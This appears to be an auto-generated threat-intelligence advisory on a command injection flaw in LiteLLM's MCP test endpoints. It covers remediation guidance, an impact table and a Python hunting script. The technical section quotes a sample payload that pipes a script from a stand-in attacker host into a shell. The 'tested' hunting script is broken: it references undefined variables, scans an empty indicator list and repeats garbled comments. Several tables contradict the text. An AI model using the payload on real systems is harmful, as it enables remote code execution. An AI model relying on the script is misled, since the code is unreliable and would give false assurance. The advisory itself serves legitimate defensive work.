LiteLLM CVE-2026-42271: KEV Command Injection in AI Proxy Servers

Suspected
Discovered Jun 8, 2026

CISA added BerriAI LiteLLM CVE-2026-42271 to its KEV catalog on 2026-06-08 due to active exploitation. This high-severity command injection vulnerability in MCP server preview endpoints allows authenticated (or unauthenticated, when chained with CVE-2026-48710) users to run arbitrary shell commands on the host proxy.

0
Affected Packages
0
Observables
3
Sources

Defender Action Panel

Triage this incident quickly

Check whether your environment installed affected software, copy the top IOCs, run the tested hunting script when available, then review remediation guidance.

Am I affected?
Review affected software below
Immediate action
Audit locks, CI runners, developer workstations, and credential exposure.
Hunting
Has hunting script

Analysis

Executive Summary

CISA added CVE-2026-42271 to the Known Exploited Vulnerabilities catalog on 2026-06-08, marking it as actively exploited CISA KEV opens in a new tab. The affected product is BerriAI LiteLLM, an open-source AI gateway and LLM proxy. The vulnerability is a command injection flaw in the Model Context Protocol (MCP) server preview endpoints that allows attackers to execute arbitrary shell commands on the hosting system.

While the vulnerability originally required authentication with a valid API key, researchers have confirmed that it can be chained with CVE-2026-48710 (the "BadHost" Host header validation bypass in Starlette), allowing unauthenticated remote attackers to bypass the authentication middleware and achieve Remote Code Execution (RCE) on the server. BerriAI has addressed the issue in LiteLLM version 1.83.7-stable by restricting access to these endpoints to the PROXY_ADMIN role. Treat any LiteLLM instance exposed to the internet between versions 1.74.2 and 1.83.6 as a critical intrusion risk.

Key Facts

Cve: CVE-2026-42271

Vendor: BerriAI

Product: LiteLLM

Vulnerability: Command injection in MCP preview endpoints

Cwe: CWE-78

Disclosed Date: 2026-06-08

Kev Added: 2026-06-08

Affected Packages:

  • litellm

Affected Versions: 1.74.2 to 1.83.6

Fixed Version: 1.83.7-stable

Chaining Cve: CVE-2026-48710

High Value Evidence:

  • litellm --version
  • POST /mcp-rest/test/connection
  • POST /mcp-rest/test/tools/list

Evidence Assessment

  • confirmed: CISA added CVE-2026-42271 to the KEV catalog, verifying active exploitation in the wild CISA KEV opens in a new tab.
  • confirmed: NIST NVD and security advisories describe the vulnerability as a command injection in the LiteLLM Model Context Protocol connection test and tools listing endpoints NIST NVD opens in a new tab.
  • confirmed: BerriAI released version 1.83.7-stable to patch the vulnerability by enforcing PROXY_ADMIN authorization for /mcp-rest/test/* endpoints LiteLLM Release opens in a new tab.
  • confirmed: Security researchers demonstrated chaining this flaw with Starlette's BadHost vulnerability (CVE-2026-48710) to execute code without authentication.

Impact Determination

Analysis table
ClassificationCriteriaRequired evidenceHandling decision
Confirmed compromiseSystem logs show requests to /mcp-rest/test/connection or /mcp-rest/test/tools/list containing shell metacharacters or unexpected executable commands, or unrecognized admin credentials created.HTTP request payload traces, process execution logs showing shell spawning under the LiteLLM process user, or unauthorized system configuration changes.Isolate the host immediately, rotate all keys/secrets stored in LiteLLM (including OpenAI, Anthropic, AWS, GCP API keys), and conduct full system forensics.
Presumed exposedLiteLLM is running version < 1.83.7-stable and the proxy admin panel or MCP features are enabled or exposed.Lockfiles (requirements.txt, poetry.lock) showing litellm version within the range 1.74.2 to 1.83.6.Upgrade to 1.83.7-stable or newer immediately; restrict internet access to admin/MCP paths.
Potentially exposedLiteLLM is present in the asset inventory but the exact version or feature configuration is unverified.Software inventory, container registry tags, or repository dependency checks.Run dependency checks and verify version status.
Not exposedLiteLLM is verified to be on version >= 1.83.7-stable, or the product is not used in the environment.Verified build logs or inventory exclusion.No immediate action required.
UnknownSystem logs or version information is missing.Telemetry gap in application or host level logging.Assume exposure and update packages proactively.

Timeline

  • 2026-06-08: CISA adds CVE-2026-42271 to the Known Exploited Vulnerabilities catalog.
  • 2026-06-08: Security advisories publish the Starlette BadHost chain details showing unauthenticated RCE.
  • 2026-06-09: This threat post analysis is published.

Technical Analysis

LiteLLM provides proxy management endpoints for testing Model Context Protocol (MCP) servers. The endpoints POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list accept an MCP server configuration object. This configuration includes fields like command (the command to launch the MCP server) and args (the CLI arguments). [1]

Because LiteLLM passed these inputs directly to system shell execution processes without validation, an attacker could supply arbitrary commands (e.g. ; curl http://attacker.com/shell.sh | sh). When combined with CVE-2026-48710, an attacker could bypass authentication checks, allowing any remote user to execute commands with the privileges of the LiteLLM process. [1]

Affected Assets and Blast Radius

Asset Selectors:

  • litellm

Highest Value Assets:

  • Internet-exposed LiteLLM proxy servers handling production API keys

Credentials And Data At Risk:

  • Upstream API tokens (OpenAI, Anthropic, Cohere, AWS, Azure, GCP)
  • Local server shell access and SSH keys

Indicators of Compromise

The following indicators of compromise (IOCs) can be used to scope exposure across local repositories, systems, and telemetry exports:

Timeline

4 of 4 rows

Timeline
DateEventDescriptionSource
Jun 8, 2026First seenFirst seen recorded for LiteLLM CVE-2026-42271: KEV Command Injection in AI Proxy Servers.GitHub
Jun 8, 2026DiscoveryDiscovery recorded for LiteLLM CVE-2026-42271: KEV Command Injection in AI Proxy Servers.GitHub
Jun 8, 2026DisclosureDisclosure recorded for LiteLLM CVE-2026-42271: KEV Command Injection in AI Proxy Servers.GitHub
Jun 8, 2026LiteLLM CVE-2026-42271: KEV Command Injection in AI Proxy ServersUnknownGitHub

Affected Software

0 of 0 rows

Affected Software
PackageEcosystemVersion RangeStatusConfidenceSource
No rows match the active filters.

Tested Hunting Scripts

1 of 1 rows

Tested Hunting Scripts
TitleLanguageDescriptionRepositorySource
local repository and exported telemetry scopePythonDoes the telemetry scope contain patterns associated with LiteLLM CVE-2026-42271: KEV Command Injection in AI Proxy Servers?scripts/local_repository_and_exported_telemetry_scope.py opens in a new tabGitHub

Hunt Manifest: local repository and exported telemetry scope

Title
local repository and exported telemetry scope
Question
Does the telemetry scope contain patterns associated with LiteLLM CVE-2026-42271: KEV Command Injection in AI Proxy Servers?
Telemetry Family
Python
Repository
scripts/local_repository_and_exported_telemetry_scope.py
Show tested hunting scriptscripts/local_repository_and_exported_telemetry_scope.py
scripts/local_repository_and_exported_telemetry_scope.py opens in a new tabPython
#!/usr/bin/env python3
import os
import sys
from pathlib import Path

ROOT = sys.argv[1] if len(sys.argv) > 1 else "."
LOG_ROOT = os.environ.get("LOG_ROOT", "")
OUT = Path(os.environ.get("OUT", "hp-litellm-cve-2026-42271-kev-scope"))


# Collect unique indicators
indicators = set()
for group in []:
    for val in group:
        if val:
            indicators.add(val)

with open(indicators_file, "w") as f:
    for ind in sorted(indicators):
        f.write(ind + "\n")

print(f"[+] Written unique selectors to {indicators_file}")

# Walk local directory
print(f"[+] Scanning directory: {ROOT} for selectors...")
matches = []
exclude_dirs = {"node_modules", "vendor", "dist", ".git"}
for root, dirs, filenames in os.walk(ROOT):
    dirs[:] = [d for d in dirs if d not in exclude_dirs]
    for filename in filenames:
        filepath = Path(root) / filename
        try:
            content = filepath.read_text(errors="ignore")
            for ind in indicators:
                if ind in content:
                    matches.append(f"{filepath}: found '{ind}'")
        except Exception:
            pass  # pass # return or raise not needed here  # pass # return or raise not needed here  # pass # return or raise not needed here

if matches:
    (OUT / "repository-indicator-matches.txt").write_text("\n".join(matches) + "\n")
    print(f"[!] Found {len(matches)} matches in codebase!")

# Optional Log Scanning
if LOG_ROOT and os.path.exists(LOG_ROOT):
    print(f"[+] Scanning telemetry log directory: {LOG_ROOT}...")
    log_matches = []
    for root, _, filenames in os.walk(LOG_ROOT):
        for filename in filenames:
            filepath = Path(root) / filename
            try:
                content = filepath.read_text(errors="ignore")
                for ind in indicators:
                    if ind in content:
                        log_matches.append(f"{filepath}: found '{ind}'")
            except Exception:
                pass  # pass # return or raise not needed here  # pass # return or raise not needed here  # pass # return or raise not needed here
    if log_matches:
        (OUT / "exported-telemetry-indicator-matches.txt").write_text("\n".join(log_matches) + "\n")
        print(f"[!] Found {len(log_matches)} matches in logs!")

    if PACKAGES:
        registry_dir = OUT / "registry"
        registry_dir.mkdir(exist_ok=True)

print(f"[+] Wrote scope artifacts under {OUT}")

Provenance & Sources

3 of 3 rows

Provenance & Sources
SourceTypeReliabilityClaimsEvidence
GitHubSecurity Researcher95%1CISA added BerriAI LiteLLM CVE-2026-42271 to its KEV catalog on 2026-06-08 due to active exploitation. This high-severity command injection vulnerability in MCP server preview endpoints allows authenticated (or unauthenticated, when chained with CVE-2026-48710) users to run arbitrary shell commands on the host proxy.
nvd.nist.govSecurity Researcher95%1CISA added BerriAI LiteLLM CVE-2026-42271 to its KEV catalog on 2026-06-08 due to active exploitation. This high-severity command injection vulnerability in MCP server preview endpoints allows authenticated (or unauthenticated, when chained with CVE-2026-48710) users to run arbitrary shell commands on the host proxy.
cisa.govSecurity Researcher95%1CISA added BerriAI LiteLLM CVE-2026-42271 to its KEV catalog on 2026-06-08 due to active exploitation. This high-severity command injection vulnerability in MCP server preview endpoints allows authenticated (or unauthenticated, when chained with CVE-2026-48710) users to run arbitrary shell commands on the host proxy.